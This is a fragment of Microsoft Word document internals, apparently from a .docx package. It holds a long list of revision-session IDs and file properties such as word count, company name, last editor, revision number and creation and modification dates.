    <w:rsid w:val="003B3C13"/>
    <w:rsid w:val="003B3C78"/>
    <w:rsid w:val="003B4B44"/>
    <w:rsid w:val="003D0806"/>
    <w:rsid w:val="003E2F0A"/>
    <w:rsid w:val="004007C9"/>
    <w:rsid w:val="0040132E"/>
    <w:rsid w:val="00401433"/>
    <w:rsid w:val="004232F7"/>
    <w:rsid w:val="00425106"/>
    <w:rsid w:val="00437C43"/>
    <w:rsid w:val="004617C6"/>
    <w:rsid w:val="004649E1"/>
    <w:rsid w:val="004709AD"/>
    <w:rsid w:val="00474435"/>
    <w:rsid w:val="00476324"/>
    <w:rsid w:val="0048113B"/>
    <w:rsid w:val="004940CE"/>
    <w:rsid w:val="004A4268"/>
    <w:rsid w:val="004A4E96"/>
    <w:rsid w:val="004B6706"/>
    <w:rsid w:val="004C5904"/>
    <w:rsid w:val="004C751D"/>
    <w:rsid w:val="00505791"/>
    <w:rsid w:val="005118DC"/>
    <w:rsid w:val="005157A4"/>
    <w:rsid w:val="00523166"/>
    <w:rsid w:val="00550BB7"/>
    <w:rsid w:val="00555245"/>
    <w:rsid w:val="00555C07"/>
    <w:rsid w:val="00587954"/>
    <w:rsid w:val="00597E1D"/>
    <w:rsid w:val="005A008F"/>
    <w:rsid w:val="005A5B4C"/>
    <w:rsid w:val="005C3A02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034D0"/>
    <w:rsid w:val="00617ADB"/>
    <w:rsid w:val="00617F37"/>
    <w:rsid w:val="00625302"/>
    <w:rsid w:val="00627002"/>
    <w:rsid w:val="00637253"/>
    <w:rsid w:val="00641925"/>
    <w:rsid w:val="0064465F"/>
    <w:rsid w:val="0064643F"/>
    <w:rsid w:val="00652A30"/>
    <w:rsid w:val="0065541C"/>
    <w:rsid w:val="00660387"/>
    <w:rsid w:val="00665204"/>
    <w:rsid w:val="006721DB"/>
    <w:rsid w:val="00674AF6"/>
    <w:rsid w:val="00682D6D"/>
    <w:rsid w:val="006A0D84"/>
    <w:rsid w:val="006B3CD5"/>
    <w:rsid w:val="006B6B16"/>
    <w:rsid w:val="006D069E"/>
    <w:rsid w:val="006D7E91"/>
    <w:rsid w:val="006E050B"/>
    <w:rsid w:val="006E10F2"/>
    <w:rsid w:val="006E4479"/>
    <w:rsid w:val="006F1751"/>
    <w:rsid w:val="00720DCE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97D18"/>
    <w:rsid w:val="007A2B43"/>
    <w:rsid w:val="007A4E13"/>
    <w:rsid w:val="007C7FA3"/>
    <w:rsid w:val="007D2CEF"/>
    <w:rsid w:val="007D62E2"/>
    <w:rsid w:val="0080497D"/>
    <w:rsid w:val="0081169A"/>
    <w:rsid w:val="008124FC"/>
    <w:rsid w:val="00814B9A"/>
    <w:rsid w:val="00815394"/>
    <w:rsid w:val="008155E0"/>
    <w:rsid w:val="0081777E"/>
    <w:rsid w:val="00823592"/>
    <w:rsid w:val="00825A2C"/>
    <w:rsid w:val="0084241C"/>
    <w:rsid w:val="00846296"/>
    <w:rsid w:val="008465C6"/>
    <w:rsid w:val="00856ADF"/>
    <w:rsid w:val="00857C95"/>
    <w:rsid w:val="00872F29"/>
    <w:rsid w:val="00876FD3"/>
    <w:rsid w:val="0088090F"/>
    <w:rsid w:val="00882EB7"/>
    <w:rsid w:val="00887A50"/>
    <w:rsid w:val="008A2582"/>
    <w:rsid w:val="008B6594"/>
    <w:rsid w:val="008C4370"/>
    <w:rsid w:val="008C628E"/>
    <w:rsid w:val="008C6723"/>
    <w:rsid w:val="008D38CB"/>
    <w:rsid w:val="008D3AD9"/>
    <w:rsid w:val="008D76C5"/>
    <w:rsid w:val="008E1E5C"/>
    <w:rsid w:val="008E6E9E"/>
    <w:rsid w:val="008E7F77"/>
    <w:rsid w:val="008F31ED"/>
    <w:rsid w:val="008F380D"/>
    <w:rsid w:val="008F66F0"/>
    <w:rsid w:val="00907F1D"/>
    <w:rsid w:val="00910423"/>
    <w:rsid w:val="00910DD8"/>
    <w:rsid w:val="00923570"/>
    <w:rsid w:val="00924F01"/>
    <w:rsid w:val="0092702C"/>
    <w:rsid w:val="00930BE8"/>
    <w:rsid w:val="00957AFB"/>
    <w:rsid w:val="0097417E"/>
    <w:rsid w:val="00982A6A"/>
    <w:rsid w:val="009833A3"/>
    <w:rsid w:val="00996068"/>
    <w:rsid w:val="009A03E6"/>
    <w:rsid w:val="009A40E4"/>
    <w:rsid w:val="009B5275"/>
    <w:rsid w:val="009C41A5"/>
    <w:rsid w:val="009C5013"/>
    <w:rsid w:val="009C525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61DEF"/>
    <w:rsid w:val="00A70535"/>
    <w:rsid w:val="00A71094"/>
    <w:rsid w:val="00A93238"/>
    <w:rsid w:val="00AA158F"/>
    <w:rsid w:val="00AB584B"/>
    <w:rsid w:val="00AC0F62"/>
    <w:rsid w:val="00AC628A"/>
    <w:rsid w:val="00AD0821"/>
    <w:rsid w:val="00AF506D"/>
    <w:rsid w:val="00B04203"/>
    <w:rsid w:val="00B1282C"/>
    <w:rsid w:val="00B1388A"/>
    <w:rsid w:val="00B26530"/>
    <w:rsid w:val="00B4241E"/>
    <w:rsid w:val="00B45F77"/>
    <w:rsid w:val="00B53006"/>
    <w:rsid w:val="00B550B9"/>
    <w:rsid w:val="00B55769"/>
    <w:rsid w:val="00B61A81"/>
    <w:rsid w:val="00B81882"/>
    <w:rsid w:val="00B81B30"/>
    <w:rsid w:val="00B91EC2"/>
    <w:rsid w:val="00B97679"/>
    <w:rsid w:val="00BA5C9D"/>
    <w:rsid w:val="00BB0C97"/>
    <w:rsid w:val="00BC3ED6"/>
    <w:rsid w:val="00BC55CA"/>
    <w:rsid w:val="00BC7E84"/>
    <w:rsid w:val="00BE1CDE"/>
    <w:rsid w:val="00BE31C1"/>
    <w:rsid w:val="00BE6255"/>
    <w:rsid w:val="00BF1B8D"/>
    <w:rsid w:val="00BF6D6C"/>
    <w:rsid w:val="00C00CCC"/>
    <w:rsid w:val="00C0396B"/>
    <w:rsid w:val="00C074D3"/>
    <w:rsid w:val="00C11DF2"/>
    <w:rsid w:val="00C26739"/>
    <w:rsid w:val="00C4330E"/>
    <w:rsid w:val="00C52BCD"/>
    <w:rsid w:val="00C53014"/>
    <w:rsid w:val="00C63726"/>
    <w:rsid w:val="00C64225"/>
    <w:rsid w:val="00C90A89"/>
    <w:rsid w:val="00C949F8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67E0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34164"/>
    <w:rsid w:val="00D37522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A69D0"/>
    <w:rsid w:val="00DA78D7"/>
    <w:rsid w:val="00DC1546"/>
    <w:rsid w:val="00DC66D8"/>
    <w:rsid w:val="00DE7333"/>
    <w:rsid w:val="00DF4264"/>
    <w:rsid w:val="00E059A1"/>
    <w:rsid w:val="00E10F14"/>
    <w:rsid w:val="00E26930"/>
    <w:rsid w:val="00E32549"/>
    <w:rsid w:val="00E40DAA"/>
    <w:rsid w:val="00E624FB"/>
    <w:rsid w:val="00E62C56"/>
    <w:rsid w:val="00E72073"/>
    <w:rsid w:val="00E82F33"/>
    <w:rsid w:val="00E87625"/>
    <w:rsid w:val="00E92F15"/>
    <w:rsid w:val="00EA2EFB"/>
    <w:rsid w:val="00EB1759"/>
    <w:rsid w:val="00EC3F8F"/>
    <w:rsid w:val="00EC5EC9"/>
    <w:rsid w:val="00EC6A78"/>
    <w:rsid w:val="00ED4B4B"/>
    <w:rsid w:val="00ED5D53"/>
    <w:rsid w:val="00EE1DDC"/>
    <w:rsid w:val="00EE6B56"/>
    <w:rsid w:val="00EF1DE0"/>
    <w:rsid w:val="00EF605B"/>
    <w:rsid w:val="00F1241F"/>
    <w:rsid w:val="00F201C7"/>
    <w:rsid w:val="00F268CA"/>
    <w:rsid w:val="00F45BAD"/>
    <w:rsid w:val="00F519A6"/>
    <w:rsid w:val="00F52D41"/>
    <w:rsid w:val="00F56F05"/>
    <w:rsid w:val="00F71B88"/>
    <w:rsid w:val="00F80CFC"/>
    <w:rsid w:val="00F8364F"/>
    <w:rsid w:val="00F86C6E"/>
    <w:rsid w:val="00FA448D"/>
    <w:rsid w:val="00FA5499"/>
    <w:rsid w:val="00FD0685"/>
    <w:rsid w:val="00FE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4007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4007C9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9</Pages>
  <Words>916</Words>
  <Characters>5223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Company>Lenovo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Rui Jason</cp:lastModifiedBy>
  <cp:revision>96</cp:revision>
  <cp:lastPrinted>2007-09-24T09:20:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-26T07:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T02:36:00Z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